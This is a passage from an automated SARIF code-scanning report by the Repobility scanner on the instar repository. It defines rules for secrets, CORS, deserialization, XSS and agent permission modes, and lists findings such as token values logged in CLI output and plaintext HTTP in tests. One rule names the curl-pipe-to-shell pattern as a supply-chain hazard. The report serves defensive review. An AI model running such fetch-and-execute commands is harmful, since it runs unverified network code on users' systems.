{"version": "2.1.0", "$schema": "https://json.schemastore.org/sarif-2.1.0.json", "runs": [{"tool": {"driver": {"name": "Repobility", "informationUri": "https://repobility.com", "rules": [{"id": "QUAL003", "name": "Magic number used as default arg", "shortDescription": {"text": "Magic number used as default arg"}, "fullDescription": {"text": "Using hardcoded default values for complex configuration objects makes the code brittle and difficult to manage. Consider using a dedicated factory or builder pattern.\n\nAuto-promoted from proposal 444 on 2026-05-12. Synth confidence: 0.85. FP estimate: 0.00."}, "properties": {"scanner": "repobility", "category": "quality", "severity": "medium", "confidence": 0.85, "cwe": "", "owasp": ""}}, {"id": "LOG001", "name": "PII printed to stdout/stderr", "shortDescription": {"text": "PII printed to stdout/stderr"}, "fullDescription": {"text": "Logging password/token/email/ssn directly to stdout."}, "properties": {"scanner": "repobility", "category": "logging", "severity": "medium", "confidence": 0.85, "cwe": "", "owasp": ""}}, {"id": "CORS001", "name": "CORS misconfiguration \u2014 wildcard Access-Control-Allow-Origin", "shortDescription": {"text": "CORS misconfiguration \u2014 wildcard Access-Control-Allow-Origin"}, "fullDescription": {"text": "Access-Control-Allow-Origin: * exposes the API to any browser origin. Acceptable for public read-only endpoints; dangerous when paired with credentials or write endpoints."}, "properties": {"scanner": "repobility", "category": "auth", "severity": "medium", "confidence": 0.85, "cwe": "", "owasp": ""}}, {"id": "CRYP001", "name": "Crypto \u2014 plaintext HTTP for sensitive endpoint", "shortDescription": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "fullDescription": {"text": "Hardcoded http:// (not localhost) for endpoints that handle credentials or data."}, "properties": {"scanner": "repobility", "category": "crypto", "severity": "medium", "confidence": 0.45, "cwe": "", "owasp": ""}}, {"id": "WEB003", "name": "Public web service has no security.txt", "shortDescription": {"text": "Public web service has no security.txt"}, "fullDescription": {"text": "security.txt gives researchers and customers a safe disclosure channel. Public web apps and APIs should publish it under /.well-known/security.txt."}, "properties": {"scanner": "repobility-web-presence", "category": "quality", "severity": "medium", "confidence": 0.78, "cwe": "", "owasp": ""}}, {"id": "JRN003", "name": "Frontend API reference is not matched by discovered backend routes", "shortDescription": {"text": "Frontend API reference is not matched by discovered backend routes"}, "fullDescription": {"text": "A frontend string references a same-origin API path that Repobility could not match to backend route inventory. This often causes live 404s in user journeys."}, "properties": {"scanner": "repobility-journey-contract", "category": "quality", "severity": "medium", "confidence": 0.74, "cwe": "", "owasp": ""}}, {"id": "JRN002", "name": "Browser storage is used for session token material", "shortDescription": {"text": "Browser storage is used for session token material"}, "fullDescription": {"text": "localStorage and sessionStorage are readable by injected JavaScript. For sensitive sessions, this turns XSS into account compromise."}, "properties": {"scanner": "repobility-journey-contract", "category": "auth", "severity": "medium", "confidence": 0.82, "cwe": "", "owasp": ""}}, {"id": "AUC009", "name": "[AUC009] Sensitive function route lacks elevated authorization evidence: A route appears to perform a sensitive function", "shortDescription": {"text": "[AUC009] Sensitive function route lacks elevated authorization evidence: A route appears to perform a sensitive function such as export, invite, role, token, billing, or destructive action without elevated policy evidence. Endpoint: DELETE "}, "fullDescription": {"text": "A route appears to perform a sensitive function such as export, invite, role, token, billing, or destructive action without elevated policy evidence. Endpoint: DELETE /semantic/forget/:id."}, "properties": {"scanner": "repobility-access-control", "category": "auth", "severity": "medium", "confidence": 0.68, "cwe": "CWE-285", "owasp": "API5:2023 Broken Function Level Authorization"}}, {"id": "AUC004", "name": "[AUC004] Admin route does not show super_admin separation: An administrative route was detected without nearby evidence ", "shortDescription": {"text": "[AUC004] Admin route does not show super_admin separation: An administrative route was detected without nearby evidence that platform super_admin access is separated from tenant/application admin access. Endpoint: GET /git/log."}, "fullDescription": {"text": "An administrative route was detected without nearby evidence that platform super_admin access is separated from tenant/application admin access. Endpoint: GET /git/log."}, "properties": {"scanner": "repobility-access-control", "category": "auth", "severity": "medium", "confidence": 0.66, "cwe": "CWE-285", "owasp": "API5:2023 Broken Function Level Authorization"}}, {"id": "AUC002", "name": "[AUC002] Low visible authorization coverage in route inventory: Only 22.5% of discovered routes show nearby authenticati", "shortDescription": {"text": "[AUC002] Low visible authorization coverage in route inventory: Only 22.5% of discovered routes show nearby authentication, authorization, middleware, or public-route evidence."}, "fullDescription": {"text": "Only 22.5% of discovered routes show nearby authentication, authorization, middleware, or public-route evidence."}, "properties": {"scanner": "repobility-access-control", "category": "auth", "severity": "medium", "confidence": 0.74, "cwe": "CWE-285", "owasp": "WSTG-AUTHZ"}}, {"id": "AUC001", "name": "[AUC001] No Repobility access matrix policy found: The repository uses web/API frameworks but does not define .repobilit", "shortDescription": {"text": "[AUC001] No Repobility access matrix policy found: The repository uses web/API frameworks but does not define .repobility/access.yml or equivalent authorization documentation."}, "fullDescription": {"text": "The repository uses web/API frameworks but does not define .repobility/access.yml or equivalent authorization documentation."}, "properties": {"scanner": "repobility-access-control", "category": "auth", "severity": "medium", "confidence": 0.92, "cwe": "CWE-285", "owasp": "WSTG-AUTHZ"}}, {"id": "DKR001", "name": "Docker final stage has no non-root USER", "shortDescription": {"text": "Docker final stage has no non-root USER"}, "fullDescription": {"text": "Docker images run as root unless the image or Dockerfile switches to a non-root user."}, "properties": {"scanner": "repobility-docker", "category": "docker", "severity": "medium", "confidence": 0.82, "cwe": "", "owasp": ""}}, {"id": "ERR002", "name": "[ERR002] Empty Catch Block: Empty catch blocks hide errors.", "shortDescription": {"text": "[ERR002] Empty Catch Block: Empty catch blocks hide errors."}, "fullDescription": {"text": "Log the error or rethrow it. Use console.error() at minimum."}, "properties": {"scanner": "repobility-threat-engine", "category": "error_handling", "severity": "medium", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "SEC007", "name": "[SEC007] Unsafe Deserialization: Unsafe deserialization can execute arbitrary code.", "shortDescription": {"text": "[SEC007] Unsafe Deserialization: Unsafe deserialization can execute arbitrary code."}, "fullDescription": {"text": "Use yaml.safe_load() instead of yaml.load(). Avoid pickle for untrusted data."}, "properties": {"scanner": "repobility-threat-engine", "category": "deserialization", "severity": "medium", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "ERR001", "name": "[ERR001] Silent Exception Swallowing: Silently swallowing all exceptions hides bugs. Even in cleanup code, log at DEBUG ", "shortDescription": {"text": "[ERR001] Silent Exception Swallowing: Silently swallowing all exceptions hides bugs. Even in cleanup code, log at DEBUG level."}, "fullDescription": {"text": "Log the error: `except Exception: logger.debug('cleanup failed', exc_info=True)`. Or handle specific exception types."}, "properties": {"scanner": "repobility-threat-engine", "category": "error_handling", "severity": "medium", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "AGT012", "name": "Agent control bridge may listen on a network interface without visible auth", "shortDescription": {"text": "Agent control bridge may listen on a network interface without visible auth"}, "fullDescription": {"text": "Agent, MCP, sidecar, and command bridge servers often start as local helpers. Binding them to 0.0.0.0 or a default all-interface listener without an authorization guard can expose tool execution or session data to the LAN."}, "properties": {"scanner": "repobility-agent-runtime", "category": "quality", "severity": "medium", "confidence": 0.72, "cwe": "", "owasp": ""}}, {"id": "AGT013", "name": "Agent auto-approve or skip-permissions mode is easy to enable", "shortDescription": {"text": "Agent auto-approve or skip-permissions mode is easy to enable"}, "fullDescription": {"text": "Codex/agent auto-approve, YOLO, or skip-permissions modes can be useful in isolated automation, but they remove the human checkpoint before command execution, network access, and file edits."}, "properties": {"scanner": "repobility-agent-runtime", "category": "quality", "severity": "medium", "confidence": 0.68, "cwe": "", "owasp": ""}}, {"id": "AIC003", "name": "Duplicated implementation block across source files", "shortDescription": {"text": "Duplicated implementation block across source files"}, "fullDescription": {"text": "Duplicated blocks are a common artifact when generated code is pasted or recreated instead of reused. They increase maintenance cost because every future bug fix must be found in multiple locations."}, "properties": {"scanner": "repobility-ai-code-hygiene", "category": "quality", "severity": "medium", "confidence": 0.86, "cwe": "", "owasp": ""}}, {"id": "QUAL004", "name": "Placeholder default username (admin/admin)", "shortDescription": {"text": "Placeholder default username (admin/admin)"}, "fullDescription": {"text": "foo@bar.com / john.doe@example.com / admin/admin / changeme \u2014 typical AI placeholder credentials."}, "properties": {"scanner": "repobility", "category": "quality", "severity": "low", "confidence": 0.85, "cwe": "", "owasp": ""}}, {"id": "WEB005", "name": "robots.txt does not advertise a sitemap", "shortDescription": {"text": "robots.txt does not advertise a sitemap"}, "fullDescription": {"text": "Sitemap directives in robots.txt help crawlers and AI agents find the canonical public URL inventory quickly."}, "properties": {"scanner": "repobility-web-presence", "category": "quality", "severity": "low", "confidence": 0.74, "cwe": "", "owasp": ""}}, {"id": "DKR008", "name": ".dockerignore misses sensitive defaults", "shortDescription": {"text": ".dockerignore misses sensitive defaults"}, "fullDescription": {"text": ".dockerignore exists but does not cover common secret or VCS patterns."}, "properties": {"scanner": "repobility-docker", "category": "docker", "severity": "low", "confidence": 0.72, "cwe": "", "owasp": ""}}, {"id": "SEC006", "name": "[SEC006] XSS Risk: Direct HTML injection without sanitization.", "shortDescription": {"text": "[SEC006] XSS Risk: Direct HTML injection without sanitization."}, "fullDescription": {"text": "Use textContent instead of innerHTML. Sanitize with DOMPurify."}, "properties": {"scanner": "repobility-threat-engine", "category": "injection", "severity": "low", "confidence": 0.4, "cwe": "", "owasp": ""}}, {"id": "ERR003", "name": "[ERR003] Ignored Error (Go): Ignoring error return values.", "shortDescription": {"text": "[ERR003] Ignored Error (Go): Ignoring error return values."}, "fullDescription": {"text": "Handle the error or use errcheck linter."}, "properties": {"scanner": "repobility-threat-engine", "category": "error_handling", "severity": "low", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "SEC015", "name": "[SEC015] Insecure Randomness for Security (and 29 more): Same pattern found in 29 additional files. Review if needed.", "shortDescription": {"text": "[SEC015] Insecure Randomness for Security (and 29 more): Same pattern found in 29 additional files. Review if needed."}, "fullDescription": {"text": "Use secrets module (Python) or crypto.getRandomValues() (JS) for security-sensitive randomness."}, "properties": {"scanner": "repobility-threat-engine", "category": "crypto", "severity": "info", "confidence": 0.2, "cwe": "", "owasp": ""}}, {"id": "SEC020", "name": "[SEC020] Secret Printed to Logs (and 30 more): Same pattern found in 30 additional files. Review if needed.", "shortDescription": {"text": "[SEC020] Secret Printed to Logs (and 30 more): Same pattern found in 30 additional files. Review if needed."}, "fullDescription": {"text": "Log only redacted, hashed, or last-four-style metadata. Rotate any secret that may have reached logs."}, "properties": {"scanner": "repobility-threat-engine", "category": "credential_exposure", "severity": "info", "confidence": 0.2, "cwe": "", "owasp": ""}}, {"id": "SUPC001", "name": "Supply chain \u2014 curl | bash anti-pattern", "shortDescription": {"text": "Supply chain \u2014 curl | bash anti-pattern"}, "fullDescription": {"text": "curl ... | sh / bash \u2014 runs unverified network code."}, "properties": {"scanner": "repobility", "category": "supply_chain", "severity": "high", "confidence": 0.85, "cwe": "", "owasp": ""}}, {"id": "AUC003", "name": "[AUC003] Object-level route lacks visible authorization: A route with an object id-like parameter does not show nearby a", "shortDescription": {"text": "[AUC003] Object-level route lacks visible authorization: A route with an object id-like parameter does not show nearby authentication or authorization evidence. This is a BOLA/IDOR review target. Endpoint: POST /jobs/:slug/trigger."}, "fullDescription": {"text": "A route with an object id-like parameter does not show nearby authentication or authorization evidence. This is a BOLA/IDOR review target. Endpoint: POST /jobs/:slug/trigger."}, "properties": {"scanner": "repobility-access-control", "category": "auth", "severity": "high", "confidence": 0.7, "cwe": "CWE-639", "owasp": "API1:2023 Broken Object Level Authorization"}}, {"id": "SECR004", "name": "Password embedded in URL", "shortDescription": {"text": "Password embedded in URL"}, "fullDescription": {"text": "https://user:password@host \u2014 leaks creds via logs, referrer, error messages."}, "properties": {"scanner": "repobility", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "cwe": "", "owasp": ""}}, {"id": "SECR001", "name": "Hardcoded secret in source", "shortDescription": {"text": "Hardcoded secret in source"}, "fullDescription": {"text": "API key, AWS access key, password, or private key embedded directly in source. AI assistants frequently leak demo creds."}, "properties": {"scanner": "repobility", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "cwe": "", "owasp": ""}}]}}, "automationDetails": {"id": "repobility/331"}, "properties": {"repository": "JKHeadley/instar", "repoUrl": "https://github.com/JKHeadley/instar", "branch": "main"}, "results": [{"ruleId": "QUAL003", "level": "warning", "message": {"text": "Magic number used as default arg"}, "properties": {"repobilityId": 21966, "scanner": "repobility", "fingerprint": "7217043fcfa87b7a4d79ba9782a4ba01", "category": "quality", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "default 1", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "magic-number-default"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/file-viewer-e2e.test.ts"}, "region": {"startLine": 108}}}]}, {"ruleId": "QUAL003", "level": "warning", "message": {"text": "Magic number used as default arg"}, "properties": {"repobilityId": 21965, "scanner": "repobility", "fingerprint": "769c6d4478bac32f67eba6b11bb282bc", "category": "quality", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "default 20", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "magic-number-default"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/scope-coherence-lifecycle.test.ts"}, "region": {"startLine": 169}}}]}, {"ruleId": "QUAL003", "level": "warning", "message": {"text": "Magic number used as default arg"}, "properties": {"repobilityId": 21964, "scanner": "repobility", "fingerprint": "39b491662bff548dfa5aa3ae175b8631", "category": "quality", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "default 60", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "magic-number-default"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/activity-partitioner.test.ts"}, "region": {"startLine": 305}}}]}, {"ruleId": "QUAL003", "level": "warning", "message": {"text": "Magic number used as default arg"}, "properties": {"repobilityId": 21963, "scanner": "repobility", "fingerprint": "22a144a837d8ba2bbfd8d17a3afd700b", "category": "quality", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "default 64", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "magic-number-default"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/InboundMessageGate.test.ts"}, "region": {"startLine": 66}}}]}, {"ruleId": "QUAL003", "level": "warning", "message": {"text": "Magic number used as default arg"}, "properties": {"repobilityId": 21962, "scanner": "repobility", "fingerprint": "7577b01cea4263b803223cffa473cbde", "category": "quality", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "default 30", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "magic-number-default"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/nonce-store-config.test.ts"}, "region": {"startLine": 49}}}]}, {"ruleId": "QUAL003", "level": "warning", "message": {"text": "Magic number used as default arg"}, "properties": {"repobilityId": 21961, "scanner": "repobility", "fingerprint": "10f1644d7f9977c4739a7be44176d0b3", "category": "quality", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "default 30", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "magic-number-default"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/nonce-store-config.test.ts"}, "region": {"startLine": 42}}}]}, {"ruleId": "QUAL003", "level": "warning", "message": {"text": "Magic number used as default arg"}, "properties": {"repobilityId": 21960, "scanner": "repobility", "fingerprint": "7016f24752aebdd0b3955ace509704c2", "category": "quality", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "default 10", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "magic-number-default"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/branch-manager.test.ts"}, "region": {"startLine": 91}}}]}, {"ruleId": "QUAL003", "level": "warning", "message": {"text": "Magic number used as default arg"}, "properties": {"repobilityId": 21959, "scanner": "repobility", "fingerprint": "49baa982ef6cc64764e47265b01332a0", "category": "quality", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "default 2", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "magic-number-default"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/branch-manager.test.ts"}, "region": {"startLine": 81}}}]}, {"ruleId": "QUAL003", "level": "warning", "message": {"text": "Magic number used as default arg"}, "properties": {"repobilityId": 21958, "scanner": "repobility", "fingerprint": "3dba5f994434521f4faa1d4858e4052f", "category": "quality", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "default 30", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "magic-number-default"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/middleware-behavioral.test.ts"}, "region": {"startLine": 208}}}]}, {"ruleId": "QUAL003", "level": "warning", "message": {"text": "Magic number used as default arg"}, "properties": {"repobilityId": 21957, "scanner": "repobility", "fingerprint": "170966e1b8d63400afbee7513cfa4db1", "category": "quality", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "default 3", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "magic-number-default"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/CommitmentTracker.test.ts"}, "region": {"startLine": 865}}}]}, {"ruleId": "QUAL003", "level": "warning", "message": {"text": "Magic number used as default arg"}, "properties": {"repobilityId": 21956, "scanner": "repobility", "fingerprint": "c726c81a7bcc08b2574ff004dc53438e", "category": "quality", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "default 30", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "magic-number-default"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/request-timeout.test.ts"}, "region": {"startLine": 43}}}]}, {"ruleId": "QUAL003", "level": "warning", "message": {"text": "Magic number used as default arg"}, "properties": {"repobilityId": 21955, "scanner": "repobility", "fingerprint": "c0a18e37eb792ad2f381adf4c5d98ac3", "category": "quality", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "default 5", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "magic-number-default"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/agent-bus-replay-protection.test.ts"}, "region": {"startLine": 707}}}]}, {"ruleId": "QUAL003", "level": "warning", "message": {"text": "Magic number used as default arg"}, "properties": {"repobilityId": 21954, "scanner": "repobility", "fingerprint": "066f4a601ec99534042c1b6341238b3b", "category": "quality", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "default 5", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "magic-number-default"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/agent-bus-replay-protection.test.ts"}, "region": {"startLine": 687}}}]}, {"ruleId": "QUAL003", "level": "warning", "message": {"text": "Magic number used as default arg"}, "properties": {"repobilityId": 21953, "scanner": "repobility", "fingerprint": "56c74dcd44090bc41813ab0a773df03d", "category": "quality", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "default 7", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "magic-number-default"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/intent-reflect.test.ts"}, "region": {"startLine": 150}}}]}, {"ruleId": "QUAL003", "level": "warning", "message": {"text": "Magic number used as default arg"}, "properties": {"repobilityId": 21952, "scanner": "repobility", "fingerprint": "db618092afdaac5e6a3e34cfe9b4b0f1", "category": "quality", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "default 10", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "magic-number-default"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/ForegroundRestartWatcher.test.ts"}, "region": {"startLine": 53}}}]}, {"ruleId": "QUAL003", "level": "warning", "message": {"text": "Magic number used as default arg"}, "properties": {"repobilityId": 21951, "scanner": "repobility", "fingerprint": "06055db3ba7b5f0a9f9d80e0dc529a32", "category": "quality", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "default 10", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "magic-number-default"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/integration/quota-collection.test.ts"}, "region": {"startLine": 278}}}]}, {"ruleId": "QUAL003", "level": "warning", "message": {"text": "Magic number used as default arg"}, "properties": {"repobilityId": 21950, "scanner": "repobility", "fingerprint": "e9a14e660da2c8602885b351657d87dd", "category": "quality", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "default 14", "aljefra_cwe": null, "aljefra_owasp": null, "aljefra_pattern_slug": "magic-number-default"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/integration/drift-routes.test.ts"}, "region": {"startLine": 99}}}]}, {"ruleId": "LOG001", "level": "warning", "message": {"text": "PII printed to stdout/stderr"}, "properties": {"repobilityId": 17014, "scanner": "repobility", "fingerprint": "3a1d8882b7019a1bdb9c6c9ab8fcf132", "category": "logging", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "console.log(`  Token file: ${opts.tokenFile || '.instar/gmail-token", "aljefra_cwe": ["CWE-532"], "aljefra_owasp": "A09:2021", "aljefra_pattern_slug": "print-pii"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/cli.ts"}, "region": {"startLine": 214}}}]}, {"ruleId": "LOG001", "level": "warning", "message": {"text": "PII printed to stdout/stderr"}, "properties": {"repobilityId": 17013, "scanner": "repobility", "fingerprint": "441e15ce2910f823f2211c3d226be28e", "category": "logging", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "console.log(`  Bot token: ${token", "aljefra_cwe": ["CWE-532"], "aljefra_owasp": "A09:2021", "aljefra_pattern_slug": "print-pii"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/cli.ts"}, "region": {"startLine": 97}}}]}, {"ruleId": "LOG001", "level": "warning", "message": {"text": "PII printed to stdout/stderr"}, "properties": {"repobilityId": 17012, "scanner": "repobility", "fingerprint": "9ba754664f6415fdc753fb9940c8121e", "category": "logging", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "console.log('Get a bot token", "aljefra_cwe": ["CWE-532"], "aljefra_owasp": "A09:2021", "aljefra_pattern_slug": "print-pii"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/cli.ts"}, "region": {"startLine": 57}}}]}, {"ruleId": "LOG001", "level": "warning", "message": {"text": "PII printed to stdout/stderr"}, "properties": {"repobilityId": 17011, "scanner": "repobility", "fingerprint": "2752f4a2bd79f44d27c3a51488abc8a7", "category": "logging", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "console.log(`  instar add telegram --token", "aljefra_cwe": ["CWE-532"], "aljefra_owasp": "A09:2021", "aljefra_pattern_slug": "print-pii"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/cli.ts"}, "region": {"startLine": 55}}}]}, {"ruleId": "LOG001", "level": "warning", "message": {"text": "PII printed to stdout/stderr"}, "properties": {"repobilityId": 17010, "scanner": "repobility", "fingerprint": "497a2b48b6e990ee19b53bf47ffb6b45", "category": "logging", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "console.log(pc.yellow('Both --token", "aljefra_cwe": ["CWE-532"], "aljefra_owasp": "A09:2021", "aljefra_pattern_slug": "print-pii"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/cli.ts"}, "region": {"startLine": 52}}}]}, {"ruleId": "CORS001", "level": "warning", "message": {"text": "CORS misconfiguration \u2014 wildcard Access-Control-Allow-Origin"}, "properties": {"repobilityId": 15805, "scanner": "repobility", "fingerprint": "1eae98da1815b95a14fc2f78eaf4443f", "category": "auth", "severity": "medium", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "corsMiddleware origin filtering', () => {", "aljefra_cwe": ["CWE-942", "CWE-346"], "aljefra_owasp": "A05:2021", "aljefra_pattern_slug": "cors-wildcard"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/middleware-behavioral.test.ts"}, "region": {"startLine": 16}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14236, "scanner": "repobility", "fingerprint": "6ce2ebd73a51ec67166bb5bea9df5dbb", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/threadline/A2AE2E.test.ts"}, "region": {"startLine": 852}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14235, "scanner": "repobility", "fingerprint": "dd330e110a7c8533b5da8b0d6aa7324c", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/launchd-node-boot-wrapper.test.ts"}, "region": {"startLine": 444}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14234, "scanner": "repobility", "fingerprint": "16f1603f5ca0ae50d2478cee2759ed67", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/phase4-dispatch-scope-provenance.test.ts"}, "region": {"startLine": 176}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14233, "scanner": "repobility", "fingerprint": "d31f601d03747166efb524864cbe3102", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/discernment-layer-e2e.test.ts"}, "region": {"startLine": 674}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14232, "scanner": "repobility", "fingerprint": "d1dd9ef3dfa38c790077af970bced294", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/messaging-lifecycle.test.ts"}, "region": {"startLine": 203}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14231, "scanner": "repobility", "fingerprint": "2f3a47d00978715b94dc211df4804fde", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/AdaptationValidator.test.ts"}, "region": {"startLine": 194}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14230, "scanner": "repobility", "fingerprint": "547b6e426c7a3a11e470f004e303a78d", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture 